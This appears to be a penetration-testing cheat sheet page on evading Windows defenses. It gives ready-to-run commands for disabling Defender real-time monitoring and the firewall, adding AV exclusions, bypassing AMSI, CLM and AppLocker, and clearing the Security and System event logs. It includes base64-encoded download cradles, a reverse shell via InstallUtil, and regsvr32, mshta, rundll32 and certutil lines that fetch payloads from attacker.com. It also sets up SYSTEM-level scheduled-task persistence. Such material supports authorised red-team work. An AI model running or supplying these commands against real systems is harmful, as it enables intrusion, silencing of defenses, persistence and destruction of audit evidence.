HacktheboxTwitter

Defense Enumeration

LOLBAS

LogoLOLBAS

AV Evasion

Enumeration

#Windows Defender Status
PS C:\\> Get-MpComputerStatus

#List AV Products
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Select-Object displayName, productState
wmic /namespace:\\root\SecurityCenter2 path AntivirusProduct GET displayName, productState

Disable Security Protections

#Disable Security Protection
PS C:\\> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true

#Set exclusion AV Rules
Add-MpPreference -ExclusionPath "c:\temp" -ExclusionProcess "c:\temp\yourstuffs.exe"

Bypass tools

Identify Bad flags (AV/AMSI)

Note: Defender must be enabled on your system, but the realtime protection and automatic sample submission features should be disabled.

Techniques

Bypass AV/EDR via DInvoke + Sliver

AMSI

Enumeration

This script contains malicious content and has been blocked by your antivirus software.

#Enumeration option #1
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\AMSI\'
#Enumeration option #2
$amsiContext = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if ($amsiContext) { "AMSI is enabled." } else { "AMSI is disabled." }

How to Bypass AMSI

Generates obfuscated PowerShell snippets that break or disable AMSI for the current process.

AMSI.fail

Bypass reverse shell

Obfuscate the script by modifing the function names, removing the comments and delete the examples section <# Remove Everything here #>

#Encode payload on Linux
echo 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3/shell.ps1")' | iconv -t UTF-16LE | base64 -w0;echo

#Encode payload on Windows
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

#Execute the payload
PS C:\> powershell.exe powershell -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=
PS C:\> powershell.exe -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=

Firewall

Enumeration

# Check firewall status
netsh advfirewall show allprofiles
Get-NetFirewallProfile | Select-Object Name, Enabled

# List firewall rules
Get-NetFirewallRule | Where-Object { $_.Enabled -eq 'True' } | Select-Object DisplayName, Direction, Action
netsh advfirewall firewall show rule name=all

Disable Firewall

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off

Manage firewall rules

#Open port (Inbound outbound)
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=in localport=1234 action=allow
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=out localport=1234 action=allow
netsh advfirewall firewall add rule name="Allw range ports" protocol=TCP dir=in localport=8000-9000 action=allow

EDR

AV Process List

Security Product

Process Names

Notes

Microsoft Defender

MsMpEng.exe, MSASCui.exe

Built-in AV/EDR

CrowdStrike Falcon

csagent.exe, CSFalconService.exe

Enterprise EDR

Elastic Endpoint

elastic-agent.exe, elastic-endpoint.exe

Open-source EDR

Carbon Black (VMware)

cb.exe, CbDefense.exe

Behavioral EDR

SentinelOne

SentinelAgent.exe

Next-gen AV/EDR

CylancePROTECT

CylanceSvc.exe

AI-based AV

Symantec (Broadcom)

ccSvcHst.exe, Rtvscan.exe

Legacy AV

Trend Micro

TmCCSF.exe

Enterprise AV

Kaspersky

avp.exe

Common in SMEs

Enumeration

Get-Process | Where-Object { 
    $_.ProcessName -match "MsMpEng|csagent|elastic|cb\.exe|Sentinel|Cylance|ccSvcHst|TmCCSF|avp|wazuh|osqueryd|sysmon" 
} | Select-Object Name, Id, Path

Constrained Language Mode

LogoGitHub - padovah4ck/PSByPassCLM: Bypass for PowerShell Constrained Language ModeGitHub
#Get LanguageMode
$executionContext.SessionState.LanguageMode

#Bypass via PSBypassCLM
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.9 /rport=443 /U C:\\Users\\amanda\\Documents\\PsBypassCLM.exe

#Bypass by using Powershell Version2
Powershell -version 2

Applocker

Enumeration

Get-AppLockerPolicy -Effective -XML | Out-File "C:\Temp\AppLockerPolicy.xml"

CollectionType

  • Exe → Executables .exe

  • Script → scripts .ps1, .bat, .vbs, etc.

  • Dll → Libraries .dll

  • Msi → Installers

  • Appx → Modern apps (UWP)

EnforcementMode

  • NotConfigured → Not apply

  • AuditOnly → Logs events, but does not block.

  • Enabled → AppLocker blocks what is not allowed.

✅ If you see AuditOnly, you are free to run without restrictions.

Device Guard

Enumerate

Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

  • RequiredSecurityProperties: (2) (Enabled).

  • VirtualizationBasedSecurityStatus: 1 (Enabled).

LSA Protection

Enumeration

reg query HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
(Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\LSA").RunAsPPL

  • 0 = Disable (Vulnerable to mimikatz).

  • 1 = Enabled (Protect lsass.exe).

User Account Control (UAC)

Enumeration

# Check if UAC is enabled (1 = Enabled, 0 = Disabled)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA

# Get UAC prompt behavior (0-5 values)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

UAC Values

Registry Key

Value

Effect

Pentester Impact

EnableLUA

1

UAC ON (default)

Blocks silent privilege escalation.

EnableLUA

0

UAC OFF (dangerous)

Easy admin access (no prompts).

ConsentPromptBehaviorAdmin

0

No prompt (auto-elevate if admin).

Best for attackers (no warnings).

ConsentPromptBehaviorAdmin

1

Prompt for credentials (secure desktop).

Needs creds/phishing.

ConsentPromptBehaviorAdmin

2 (Default)

Prompt for confirmation.

User interaction needed.

ConsentPromptBehaviorAdmin

5

Prompt only for non-Windows binaries.

Bypassable with LOLBins.

Event Log Cleansing

wevtutil cl Security
wevtutil cl System
wevtutil cl Application

Writeable paths for non-admins

C:\Windows\Tasks 
C:\Windows\Temp 
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

LOLBAS Usefull Commands to Bypass Security Solutions

regsvr32.exe – Remote Code Execution (No Disk Write)

Bypasses AMSI, AV, AppLocker

regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

  • Executes remote scriptlet files (.sct) from memory.

  • No file touches disk.

  • Evades logging and bypasses AV heuristics.

mshta.exe – HTML Application Loader

Bypasses AppLocker and basic AV

mshta http://attacker.com/payload.hta

Or run inline script:

mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -w hidden -enc <BASE64>""")

powershell.exe with Base64 Payload

Bypasses basic AV and logs

powershell -nop -w hidden -enc <Base64-Encoded Payload>

  • Use with encoded payloads to evade string-based detection.

  • Add -version 2 to bypass AMSI and Constrained Language Mode (on older systems).

rundll32.exe – DLL Execution or COM Exploit

AppLocker bypass, script execution

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://attacker.com/shell.sct");

Or execute exported function from a malicious DLL:

rundll32.exe payload.dll,ExportedFunction

InstallUtil.exe – .NET Binary Execution

Bypasses CLM, AppLocker

InstallUtil.exe /logfile= /LogToConsole=true /U payload.exe

  • payload.exe must override the Uninstall() method.

  • Can be executed under .NET framework paths.

certutil.exe – Download and Decode Payloads

Network evasion, no PowerShell

# Download file from remote server
certutil -urlcache -split -f http://attacker.com/malware.exe evil.exe

# Decode a base64 payload
certutil -decode payload.b64 payload.exe

forfiles.exe – Execute Command as File Handler

UAC bypass and execution

forfiles /p C:\ /m notepad.exe /c "cmd /c calc.exe"

wmic.exe – Execute Commands Without PowerShell or CMD

wmic process call create "cmd.exe /c calc.exe"

  • Executes commands without PowerShell, can evade detection.

schtasks.exe – Schedule Execution (Persistence + Evasion)

schtasks /create /tn "Updater" /tr "powershell.exe -enc <payload>" /sc onlogon /ru SYSTEM

  • Often whitelisted.

  • Useful for persistent or delayed payloads.

scriptrunner.exe – Executes Scripts via Signed Binary (SCCM)

scriptrunner.exe -appvscript payload.bat

  • Executes scripts using a trusted Microsoft-signed binary.

msbuild.exe – Inline C# Payload Execution

<!-- Save as payload.xml -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Exec">
    <ClassExample />
  </Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;
          public class ClassExample : Task {
            public override bool Execute() {
              System.Diagnostics.Process.Start("calc.exe");
              return true;
            }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Then run:

msbuild.exe payload.xml
PreviousPrivileged GroupsNextBypass AV/EDR via DInvoke + Sliver

Last updated